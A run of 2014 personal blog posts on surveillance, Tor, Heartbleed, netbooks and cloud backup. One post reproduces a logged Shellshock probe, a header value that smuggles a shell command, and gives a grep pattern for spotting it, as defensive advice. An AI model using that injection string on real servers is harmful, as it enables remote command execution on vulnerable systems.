merry christmas 2014

As I have noted before, 24 December is trivia’s birthday. Since my first post dates from 24 December 2006, today is trivia’s eighth birthday. It seems like only yesterday.

I haven’t posted much in the last few months. I have a lot of material I need to cover, and a backlog of articles I want (or at least wanted) to write so I will endeavour to get back into a writing routine as soon as I can. Meanwhile, since it is yet again christmas time, and it’s trivia’s birthday, I couldn’t let today pass unblogged.

Let’s hope 2015 brings all that you wish for.

Best Wishes

Mick

Permanent link to this article: https://baldric.net/2014/12/24/merry-christmas-2014/

solidarity with the tor project

On Thursday 11 December, Roger Dingledine of the Tor project posted the following email to the “tor-talk” mail list (to which I am subscribed).

I’d like to draw your attention to

https://blog.torproject.org/blog/solidarity-against-online-harassment
https://twitter.com/torproject/status/543154161236586496

One of our colleagues has been the target of a sustained campaign of harassment for the past several months. We have decided to publish this statement to publicly declare our support for her, for every member of our organization, and for every member of our community who experiences this harassment. She is not alone and her experience has catalyzed us to action. This statement is a start.

Roger asked those who deplored on-line harassment (of any person, for any reason) and who supported the Tor project’s action in publicly condemning the harassment of one of the Tor developers to add their name and voice to the blog post.

I am proud to have done so.

Permanent link to this article: https://baldric.net/2014/12/13/solidarity-with-the-tor-project/

independent hit

On trying to reach the website of the Independent newspaper today (the Grauniad is trying my patience of late), I received the following response:

Screenshot-www.independent.co.uk - Chromium

Closing the popup takes you to this page:

Screenshot-Hacked by SEA - Chromium

I haven’t checked whether this is simply a DNS redirect or an actual compromise of the Indy site, but however the graffiti was added, it indicates that the Indy has a problem.

Permanent link to this article: https://baldric.net/2014/11/27/independent-hit/

CVE-2014-6271 bash vulnerability

Guess what I found in trivia’s logs this morning?

89.207.135.125 – – [25/Sep/2014:10:48:13 +0100] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 345 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

I’ll bet a lot of cgi scripts are being poked at the moment.

Check your logs guys. A simple grep “:;}” access.log will tell you all you need to know.

(Update 27 September)

Digital Ocean, the company I use to host my Tor node and tails/whonix mirrors, has posted a useful note about the vulnerability. And John Leyden at El Reg posted about the problem here. Leyden’s article references some of the more authoritative discussions so I won’t repeat the links here.

All my systems were vulnerable, but of course have now been patched. However, the vulnerability has existed in bash for so long that I can’t help but feel deeply uneasy even though, as Michal Zalewski (aka lcamtuf) notes in his blog:

PS. As for the inevitable “why hasn’t this been noticed for 15 years” / “I bet the NSA knew about it” stuff – my take is that it’s a very unusual bug in a very obscure feature of a program that researchers don’t really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

Permanent link to this article: https://baldric.net/2014/09/26/cve-2014-6271-bash-vulnerability/

net neutrality

My apologies that this is a few weeks late – but it still bears posting. John Oliver at HBO gave the best description of the net neutrality argument I have seen so far.

Following that broadcast, the FCC servers were, rather predictably, overwhelmed by the outraged response from the trolls that Oliver set loose.

Unfortunately, as John Naughton reports in the Observer, the FCC are unlikely to be moved by that.

Permanent link to this article: https://baldric.net/2014/08/13/net-neutrality/

levison on dime

Ladar Levison and Stephen Wyatt presented the upcoming Dark Internet Mail Environment (DIME) at Defcon22 this week. According to El Reg, Levison, who shut down Lavabit, his previous mail service rather than comply with FBI demands that he divulge the private SSL certificates used to encrypt traffic on that service, said:

“I’m not upset that I got railroaded and I had to shut down my business … I’m upset because we need a mil-spec cryptographic mail system for the entire planet just to be able to talk to our friends and family without any kind of fear of government surveillance”.

I think that puts the problem into perspective.

Permanent link to this article: https://baldric.net/2014/08/11/levison-on-dime/

punctuation matters

There is a nice tweet over at @NSA_PR. It reads:

We take your privacy, seriously.

Beyond parody.

Permanent link to this article: https://baldric.net/2014/07/28/punctuation-matters/

department of dirty

Like most ‘net users I get my fair share of spam. Most of it gets binned automatically by my email system, but of course some still gets through so I am used to hitting the delete button on random email from .ru domains offering me the opportunity to “impress my girl tonight”.

Most such phishing email relies on the recipient being dumb enough, naive enough, or (possibly) drunk enough to actually click through the link to the malicious website. I was therefore more than a little astonished at an email I received today from the open rights group. That email is given below in its entirety (I have obfuscated my email address for obvious reasons).

Continue reading

Permanent link to this article: https://baldric.net/2014/07/23/department-of-dirty/

drip

I get my domestic ADSL connectivity from the rather excellent people at Andrews and Arnold.

Here’s why. And this is the original reason I moved to them.

They also happily take (and similarly reply to) GPG encrypted support questions.

Good guys. Thoroughly recommended.

Now can you /really/ see BT doing any of that?

‘thought not.

Permanent link to this article: https://baldric.net/2014/07/21/drip/

inappropriate use of technology

I have been travelling a lot over the last few months (Czech Republic, Scotland, France, Germany, Austria, Slovenia, Croatia, Italy). That travel, plus my catching up on a load of reading is my excuse for the woeful lack of posts to trivia of late. But hey, sometimes life gets in the way of blogging – which is as it should be.

A couple of things struck me whilst I have been away though. Firstly, and most bizarrely I noticed a significant number of tourists in popular, and hugely photogenic, locations (such as Prague and Dubrovnik) wandering around staring at their smartphones rather than looking at the reality around them. At first I thought that they were just checking photographs they had taken, or possibly that they were texting or emailing friends and relatives about their holidays, or worse, posting to facebook, but that did not appear to be the case. Then by chance I overheard one tourist telling his partner that they needed to “turn left ahead” whilst they walked past me so it struck me that they might just possibly be using google maps to navigate. So I watched others more carefully. And I must conclude that many people were doing just that. I can’t help but feel a little saddened that someone should choose to stare at a google app on a small screen in their hand rather than look at the beauty of something like the Charles Bridge across the Vlatva.

The second point which struck me was how much of a muppet you look if you use an iPad to take photographs.

Permanent link to this article: https://baldric.net/2014/06/30/inappropriate-use-of-technology/

a new app

My newspaper of choice, the Guardian, has for some time produced its own android (and iOS of course) app. I have often used the android app on my tablet to catch up on emerging news items at the end of the day. I also read the BBC news app for the same reason. Yesterday I received an update to the Guardian app. That update was a complete rewrite and gives the user a very different experience to the original app. For example, in the old app I could tailor the home screen to show me just the news categories I wanted (i.e. no sport, no fashion, but plenty of politics, business and UK news). In the new app I can only do that if I subscribe to a paid version. Sorrry, but no, I already pay for the newspaper, I just want this to give me updated headlines, I don’t want to have to buy the newspaper all over again.

In today’s paper (and on-line of course) there is an editorial comment on the new app explaining its background. The writer opens:

Today I am proud to announce the launch of our redesigned Guardian app. It’s been a ground-up reworking to bring you a new, advanced and beautiful Guardian app. For the first time you will have a seamless experience across phones and tablets, with a cleaner, responsive design that showcases the Guardian’s award-winning journalism to our readers around the world.

The article goes on to explain the history of the original app and the thinking behind the redesign. It continues:

We’re also thrilled to announce that GuardianWitness – the Guardian’s award-winning platform through which readers can contribute their own pictures, videos and text – is now integrated into the app, meaning readers can now contribute to assignments seamlessly and directly within the main app.

Hmmmm.

It continues:

Other new features include:

  • A new flexible layout so we can display different stories in different ways, and show readers which stories are the most important in one glance
  • Breaking news and sport alerts and up-to-the-minute live coverage
  • Increased personalisation: readers can personalise their home screen depending on what topics they’re most interested in, and create notifications to follow favourite writers, stories, series and football teams
  • Improved photo galleries and inclusion of interactives for the first time
  • Off-line reading – with intelligent caching readers will now be able to save articles to read later and have more content at their fingertips wherever they are
  • Open journalism has been built into the app, with even easier ways for readers to contribute comments, videos, photos via our new GuardianWitness integration, as well as a better commenting experience
  • New opportunities for advertisers.

I particularly like that last bit.

And of course the app needs access to my location.

Right.

(P.S. The app called “UK Newspapers” by Markus Reitberger gives access to all the UK news sites you could want – and all it asks for is network access.)

Permanent link to this article: https://baldric.net/2014/05/30/a-new-app/

nsa operation orchestra

In February of this year, Poul-Henning Kamp (a.k.a “PHK”) gave what now looks to be a peculiarly prescient presentation as the closing keynote to 2014’s FOSDEM.

In the presentation (PDF), PHK posits an NSA operation called ORCHESTRA which is designed to undermine internet security through a series of “disinformation” or “misinformation”, or “misdirection” sub operations. ORCHESTRA is intended to be cheap, non-technical, completely deniable, but effective. One of the opening slides gives ORCHESTRA’s “operation at a glance” overview as:

* Objective:
– Reduce cost of COMINT collection
* Scope:
– All above board
– No special authorizations
* Means:
– Eliminate/reduce/prevent encryption
– Enable access
– Frustrate players

PHK delivers the presentation as if he were a mid-ranking NSA staffer intending to brief NATO in Brussels. But “being American, he ends up [at FOSDEM] instead”. The truly scary part of this presentation is that it could all be completely true.

What makes the presentation so timely is his commentary on openssl. Watch it and weep.

Permanent link to this article: https://baldric.net/2014/04/16/nsa-operation-orchestra/

more heartbleed

For any readers uncertain of exactly how the heartbleed vulberability in openssl might be exploitable, Sean Cassidy over at existential type has a good explanation.

And if you find that difficult to follow, Randall Munroe over at xkcd covers it quite nicely.

heartbleed_explanation

My thanks, and appreciation as always, to a great artist.

Of course, Randall foresaw this problem back in 2008 when he published his take on the debian openssl fiasco.

Permanent link to this article: https://baldric.net/2014/04/16/more-heartbleed/

pulitzer guardian

The Guardian and the Washington Post have been jointly awarded the Pulitzer prize for public service for their reporting of Edward Snowden’s whistleblowing on the NSA’s surveillance activities.

The Guardian reports:

The Pulitzer committee praised the Guardian for its “revelation of widespread secret surveillance by the National Security Agency, helping through aggressive reporting to spark a debate about the relationship between the government and the public over issues of security and privacy”.

Unfortunately that debate seems to be taking place in the USA rather than in the UK.

In typical Guardian style, one correspondent to today’s letters page says:

Congratulations to all. Can’t wait for the film. All the President’s Men II? Johnny Depp as Alan Rusbridger?

I’d pay to see that. But I’m not sure how it ends yet.

Permanent link to this article: https://baldric.net/2014/04/16/pulitzer-guardian/

boot and nuke no more

I was contacted recently by a guy called Andy Beverley who wrote:

Hope you don’t mind me contacting you about one of your old blog posts “what gives with dban”. Thought I’d let you know that I forked DBAN a while ago, and produced a standalone program (called nwipe) that will run on any Linux OS. That means it will work with any Live CD, meaning much better hardware support.

It’s included in PartedMagic, as well as most other popular distros.

“No I don’t mind at all” is my response. In fact, since DBAN seems to be borked permanently, it is nice to see an alternative out there.

Andy’s nwipe page says that he could do with some assistance. So if anyone feels able to help him out, give him a call.

Permanent link to this article: https://baldric.net/2014/04/15/boot-and-nuke-no-more/

heartbleed

This is nasty. There is a remotely exploitable bug in openssl which leads to the leak of memory contents from the server to the client and from the client to the server. In practice this means that an attacker can read 64K chunks of memory on a vulnerable service, thus potentially exposing security critical information.

At 19.00 UTC yesterday, openssl bug CVE-2014-0160 was announced at heartbleed.com. I picked it up following a flurry of emails on the tor relays list this morning. Roger Dingledine posted a blog commentary on the bug to the tor list giving details about the likely impacts on Tor and Tor users.

Continue reading

Permanent link to this article: https://baldric.net/2014/04/08/heartbleed/

the netbook is not dead

I bought my first netbook, the Acer Aspire One, back in April 2009 – five years ago. That machine is still going strong and has seen umpteen different distros in its time. It currently runs Mint 16, and very happily too.

The little Acer has nothing on it that I value over much, all my important data is stored on my desktop (and backed up appropriately) but I find it useful as a “walking about” tool simply because it is so portable, so it still gets quite a bit of use. I am planning a few trips later this year, notably to Scotland and later (by bike) to Croatia, and I want to take something with me that will give me more flexibility in my connectivity options than simply taking my phone to collect email. In particular, it would be really useful if I could connect back to my home VPN endpoint whilst I am out and about. This is exactly the sort of thing I use the Acer for when I’m in the UK. I (briefly) considered using my Galaxy Tab, which is even lighter and more portable than the Acer, but I just don’t trust Android enough to load my openvpn certificates on to it. There is also the possibility that the Tablet could be lost or stolen (I shall be camping quite a lot). So the Acer looks a good bet. The downside of taking the Acer is the need for mains power (for recharging) of course, but I shall be staying in the odd hotel en route, and I have an apartment booked in Dubrovnik so I figure it should cope. However, I am not the only fan of the Acer – my grandson loves to sit with it on his lap in my study and watch Pingu and Octonauts (parents and grandparents of small children will understand). Given that I recognise that I might lose the Tablet, I must also assume that the Acer might disappear. My grandson wouldn’t like that. So the obvious solution is to take another AAO with me – off to ebay then.

Since my AAO is five years old, and that model has been around for longer than that, I figured I could pick up an early ZG5 with 8 or 16 Gig SSD (rather than the 160 Gig disk mine has) for about £20 – £30. Hell, I’ve bought better specced Dell laptops (I know, I know) for less than that fairly recently. I was wrong. Astonishingly, the ZG5, in all its variants, appears to still be in huge demand. I bid on a few models and lost, by quite some margin. So I set up a watch list of likely looking candidates and waited a few days to get a feel for the prices being paid. The lowest price paid was £37.00 (plus £10.00 P&P) for a very early ZG5 still running Linpus, another Linpus ZG5 with only 512Mb of RAM and an 8 Gig SSD went for £50.00 plus £9.00 P&P), most of the later models (with 1 Gig of RAM and 160 – 250 Gig disks went for around £70 – £90 (plus various P&P charges). In all I watched 20 different auctions (plus a few for similar devices such as the MSI Wind and the Samsung NC10). The lowest price I saw after the £37.00 device was £55.00 and the highest was £103.00 with a mean of just over £67. That is astonishing when you consider that you can pick up a new generic 7″ Android tablet for around £70.00 and you can get a decent branded one for just over £100. And as I said, old laptops go for silly money – just take a look at ebay or gumtree and you can pick up job lots of half a dozen or more for loose change.

So – despite what all the pundits may have said, clearly the netbook as a concept still meets the requirements of enough people (like me I guess) to keep the market bouyant. Intriguingly, the most popular machines sold (in terms of numbers of bidders) were all running XP. I just hope the the buyers intended to do as I did and wipe them to install a linux distro. Of course, having started the search for another ZG5, I just couldn’t let it go without buying one. I was eventually successful on a good one with the same specification as my original model.

The only drawback is that it is not blue…..

open

closed

Well, at least I don’t think it will be stolen.

Permanent link to this article: https://baldric.net/2014/03/31/the-netbook-is-not-dead/

the spy in your bathroom

Back in June 2008 I noted Craig Wright had posted to bugtraq reporting a “remote exploitation of an information disclosure vulnerability in Oral B’s SmartGuide management system”. I found it faintly amusing that a security researcher should have been looking for vulnerabities in a toothbrush.

I should have known better.

A report in wednesday’s on-line Guardian points to the release of a new smart tootbrush from Oral B. Apparently that toothbush will link via bluetooth to an app on either an iPhone or Android and report back to your dentist. It seems that Oral B “sees the connected toothbrush, launched as part of Mobile World Congress’s Connected City exhibition, as the next evolution of the smart bathroom.” Wayne Randall, global vice president of Oral Care at Procter and Gamble reportedly said:

“It provides the highest degree of user interaction to track your oral care habits to help improve your oral health, and we believe it will have significant impact on the future of personal oral care, providing data-based solutions for oral health, and making the relationship between dental professionals and patients a more collaborative one.”

That’s just great. GCHQ have plenty of other personal data feeds already without giving them access to our bathrooms.

Permanent link to this article: https://baldric.net/2014/02/28/the-spy-in-your-bathroom/

checking client-side ssl/tls

At the tail end of last year I mentioned a couple of tools I had used in my testing of SSL/TLS certificates used for trivia itself and my mail server. However, that post concentrated on the server side certificates and ignored the security, or otherwise, offered by the browser’s configuration. It is important to know the client side capability because without proper support there for the more secure ciphers it is pointless the server offering them in the handshake – the client-server interaction will simply negotiate downwards until both sides reach agreement on a capability. That capability may be sub-optimal.

A recent post to the Tor stackexchange site posed a question about the client side security offered by the TorBrowser Bundle v. 3.5 (which uses Firefox). The questioner had used the “howsmyssl” site to check the cipher suites which would be used by firefox in a TLS/SSL exchange and been disturbed to discover that it reportedly offered an insecure cipher (SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA). Sam Whited responded with a pointer to his blog post about improving FF’s use of TLS.

From that post, it appears that TLS 1.1 and 1.2 were off by default in FF versions prior to 27. Hence they would have been off in the TorBrowser Bundle as well.

Permanent link to this article: https://baldric.net/2014/02/12/checking-client-side-ssltls/

policy update

An exchange of emails with Mark over at bsdbox.co a day or so ago made me realise that my privacy policy needed updating. Not, I hasten to add, for any fundamental reason, but simply because a couple of the references in that policy were out of date. I have therefore amended it and version 0.2.0 is now in place. As promised in the policy, this post draws attention to the changes.

The amendments I have made are as follows:

I have amended my reference to geo-locating IP addresses because I stopped using the off-site “clustrmaps” tool some time ago. I now point out that I collect aggregate IP address geo-location data incidentally through my use of Counterize. However, as I note in the policy, I may drop Counterize shortly because it is becoming a drain on the site. Unlike static web log analysis tools, Counterize runs a script in real time to update its database. That database is now getting too large for my liking and some of the (automatic) queries it runs are not well optimised. I haven’t spent any long time investigating this, largely because my MySQL DB skills are woefully inadequate, but it looks to me as if some of the fields are not properly indexed to allow fast queries.

As an aside, readers may care to note that Counterize reports that I get between 30,000 and 40,000 hits on trivia each month and the top visiting countries are: the US at 57.8%, China at 13.6%, the EU at 6.8% and the Russian Federation at 4.5%. The dear old UK is eighth at 2.4% just ahead of Canada and the Ukraine. Those stats might look odd until you realise that I have allowed Counterize to include known webcrawlers. The biggest of these of course are based in the US, but Baidu in China is not far behind in its activity.

I have changed my references to the captcha and contact forms I use on trivia because I have stopped using Mike Challis’s plugins. I did this because Mike seems to like to update his plugins every other week or so and, much as that is to be applauded if there are real gains to be made, I found the maintenance overhead to be too high for what I was getting. Stability is good too.

Incidentally, for anyone interested in FreeBSD, particularly in its use on a server running Tor, or a website it is well worth paying a visit to Mark’s blog. He writes well and it is always worth looking at alternatives to Linux.

Permanent link to this article: https://baldric.net/2014/02/12/policy-update/

privacy matters

The Open Rights Group here in the UK has been campaigning against mass, unwarranted surveillance by GCHQ since the Snowden revelations first emerged in summer of last year. Two of its current campaigns are: “don’t spy on us” and “the day we fight back“.

I have signed both of them.

I have also written to my MP in the following terms:

I have today signed the on-line petition for the “don’t spy on us” campaign. That campaign calls for an inquiry into the mass, unwarranted, surveillance of the UK population by GCHQ.

I call upon you, as my elected representative, to support my rights under Article 8 and 10 of the European Convention on Human Rights to a private life with full, unfettered freedom of expression.

I ask that you support the campaign both on-line, and in Parliament. Parliament has been completely ineffective in its oversight of GCHQ. That must end. You, along with all other Parliamentarians must do a much better job of holding them to account.

Yours sincerely

Mick Morgan

I’ll let you know what he says (though I can guess the reply. In fact I could probably write it myself.)

Permanent link to this article: https://baldric.net/2014/02/11/privacy-matters/

compare and contrast

Foreign Secretary William Hague is apparently concerned about press restrictions in Egypt. He has reportedly urged the interim Egyptian government to demonstrate commitment to free expression.

The press release on the gov.uk website says:

Speaking today about increasing restrictions placed upon journalists and the media in Egypt, Foreign Secretary William Hague said:

  • “I am very concerned by restrictions on freedom of the press in Egypt, including reports of the recent charging of Al Jazeera journalists, two of whom are British, Sue Turton and Dominic Kane.
  • “We have raised our concerns about these cases and freedom of expression at a senior level with the Egyptian government in recent days. I will discuss these concerns with other European Foreign Ministers at the European Foreign Affairs Council on Monday, and we will continue to monitor the situation of the journalists very closely, and raise them with the Egyptian authorities.
  • “The UK believes a free and robust press is the bedrock of democracy. I urge the Egyptian interim government to demonstrate its commitment to an inclusive political process which allows for full freedom of expression and for journalists to operate without the fear of persecution.”

So, the UK Government believes that a “free and robust press is the bedrock of democracy”.

I agree.

Last weekend’s Guardian newspaper reported on the visits they had from and the conversations they had with Cabinet Secretary, Sir Jeremy Heywood and colleagues back in June and July of last year when the Snowden revelations were just starting to cause some ripples.

That article says:

In two tense meetings last June and July the cabinet secretary, Jeremy Heywood, explicitly warned the Guardian’s editor, Alan Rusbridger, to return the Snowden documents.

Heywood, sent personally by David Cameron, told the editor to stop publishing articles based on leaked material from American’s National Security Agency and GCHQ. At one point Heywood said: “We can do this nicely or we can go to law”. He added: “A lot of people in government think you should be closed down.”

It goes on:

Days later Oliver Robbins, the prime minister’s deputy national security adviser, renewed the threat of legal action. “If you won’t return it [the Snowden material] we will have to talk to ‘other people’ this evening.” Asked if Downing Street really intended to close down the Guardian if it did not comply, Robbins confirmed: “I’m saying this.”

Perhaps Hague should have a word with Cameron. They really need to be more consistent. If freedom of expression is vital in Egypt, I submit it is equally vital in the UK.

Permanent link to this article: https://baldric.net/2014/02/08/compare-and-contrast/

dis-unity

The “cloud” is achingly trendy at the moment and new companies offering some-bollocks-as-a-service (SBaaS) keep popping up all over the ‘net. Personally I am extremely unlikely to use any of the services I have seen, I just don’t trust that particular business model.

I checked out the website for one of these companies today following an article I read on El Reg. The company’s website says, in answer to its own question, “what can you do with younity?” that you can:

Spontaneously access any file, from any device, without planning ahead.

Browse all your devices at once.

It further says:

share any file.
ANY FILE STORED ON ANY COMPUTER WITHOUT PLANNING AHEAD, VIA YOUNITY OR PRIVATELY TO FACEBOOK.

(I love that “privately to facebook” bit.)

However, further down it says “Step 1, download younity for Windows or Mac, Step 2, install on iOS”. So, the “any file stored on any computer” claim is just not true if, like me you have a mixture of Linux machines, Android tablet and CyanogenMod ‘phone. I’m pretty sure that claim must breach some advertising standard and I’d complain if I cared about using the product. Fortunately I don’t.

Another “cloud” company making some interesting claims is Backblaze, the company whose blog commentary on consumer grade disks I referenced below. They supposedly offer a service with “unlimited storage”, which “automatically finds files” on your computer and then stores them in the Backblaze cloud with “military-grade encryption”. The website says that “everything except OS files” is backed up, so the system must have the freedom (and permissions) to ferret about on your local disk and then pass the files it finds out to Backblaze’s pods. Forgive me if I don’t like that idea.

The section about encryption is intriguing because it claims:

When you use Backblaze, data encryption is built in. Files scheduled for backup are encrypted on your machine. These encrypted files are then transferred over a secure SSL (https) connection to a Backblaze datacenter where they are stored encrypted on disk. We use a combination of proven industry standard public/private and symmetric encryption methods to accomplish this task. To a Backblaze customer all of this is invisible and automatic. For example, when you create your Backblaze account, we automatically generate your private key that is used to uniquely protect your data throughout our system.

They go on to say:

Upon arriving at a Backblaze datacenter, your data is assigned to one or more Storage Pods where it is stored encrypted. Access to your data is secured by your Backblaze account login information (your email address and password). When you provide these credentials, your private key is used to decrypt your data. At this point you can view your file/folder list and request a restore as desired.

A blog posting by Backblaze’s Tim Nufire gives some detail about how the company encrypts your data. On the face of it, the use of a 2048 RSA public/private key pair in conjunction with ephemeral 128 bit AES symmetric keys (to actually encrypt the data) looks impressive – particularly when the company claims that the private key can be further protected by encryption with a user provided passphrase. But given that the company is US based, that claim bothers me. I am particularly sceptical about any claims that the company is unable to decrypt private data because /they/ generate the public/private key pair and they admit (in the blog post) that they store the private key on their servers. Sorry, but if my data is private enough for me to wish to protect it with strong encryption, then I want to use keys I have generated myself, on a system which I control.

Backblaze’s description of the file restoration process does not give me any warm feeling either. Here is what they say:

When you request a data restore, we do what is known as a cloud restore. This simplifies the data restoration process. For example, let’s assume your hard drive crashes and you get a new hard drive or even a new computer. To restore your data you first log in to Backblaze using a web browser by providing your Backblaze account information (email address and password). Once you have logged in to the Backblaze secure web interface you can request a restore of your data. You do not have to install Backblaze to get your data back. To make this work, we decrypt your data on our secure restore servers and we then zip it and send it over an encrypted SSL connection to your computer. Once it arrives on your computer, you can unzip it and you have your data back.

So if I want my data back, they get a clear text copy of it all before sending it to me. Worse, they even offer to send it to me through the post on a USB disk.

I don’t call that a private recovery system.

Permanent link to this article: https://baldric.net/2014/01/22/dis-unity-2/

backblaze back seagate

In October last year I noted that the Western Digital “Green” drives in my desktop and a new RAID server build looked to be in imminent danger of early failure. That conclusion was based on a worryingly high load-cycle count which a series of posts around the net all attributed to the aggressive head parking features of these drives in order to save energy when not in use. I decided at the time to replace the desktop disk and recycle it to the RAID server. I have since decided to replace the entire RAID array as soon as I can. But which disks to use?

Well, Backblaze, a company which offers “unlimited” on-line backup storage for Mac and Windows users, has just published a rather useful set of statistics on the disks that they use in their storage arrays. The most interesting point is that they use the same domestic grade disks as would be used by you or I rather than the commercial grade ones used in high end RAID systems.

According to the backblaze blog post, at the end of 2013 they had 27,134 consumer-grade drives spinning in their “Storage Pods”. Those disks were mostly Seagate and Hitachi drives, with a (much) lower number of Western Digital also in use. Backblaze said:

Why do we have the drives we have? Basically, we buy the least expensive drives that will work. When a new drive comes on the market that looks like it would work, and the price is good, we test a pod full and see how they perform. The new drives go through initial setup tests, a stress test, and then a couple weeks in production. (A couple of weeks is enough to fill the pod with data.) If things still look good, that drive goes on the buy list. When the price is right, we buy it.

They also noted:

The drives that just don’t work in our environment are Western Digital Green 3TB drives and Seagate LP (low power) 2TB drives. Both of these drives start accumulating errors as soon as they are put into production. We think this is related to vibration. The drives do somewhat better in the new low-vibration Backblaze Storage Pod, but still not well enough.

These drives are designed to be energy-efficient, and spin down aggressively when not in use. In the Backblaze environment, they spin down frequently, and then spin right back up. We think that this causes a lot of wear on the drive.

Apart from the vibration point, I’d say that conclusion was spot-on given the reporting I have seen elsewhere. And the sheer number of drives they have in use gives a good solid statistical base upon which to draw when making future purchasing decisions. Backblaze note that the most reliable drives appear to those made by Hitachi (they get “four nines” of untroubled operation time, while the other brands just get “two nines”) but they also note that the Hitachi drive business was bought by Western Digital around 18 months ago – and WD disks do not seem to perform anywhere near as well as the others in use.

The post concludes:

We are focusing on 4TB drives for new pods. For these, our current favorite is the Seagate Desktop HDD.15 (ST4000DM000). We’ll have to keep an eye on them, though. Historically, Seagate drives have performed well at first, and then had higher failure rates later.

Our other favorite is the Western Digital 3TB Red (WD30EFRX).

We still have to buy smaller drives as replacements for older pods where drives fail. The drives we absolutely won’t buy are Western Digital 3TB Green drives and Seagate 2TB LP drives.

So I guess I’ll be buying more Seagates in future – and I was right to dump the WD caviar green when I did.

(As an aside, I’m not convinced the Backblaze backup model is a good idea, but that is not the point here).

Permanent link to this article: https://baldric.net/2014/01/21/backblaze-back-seagate/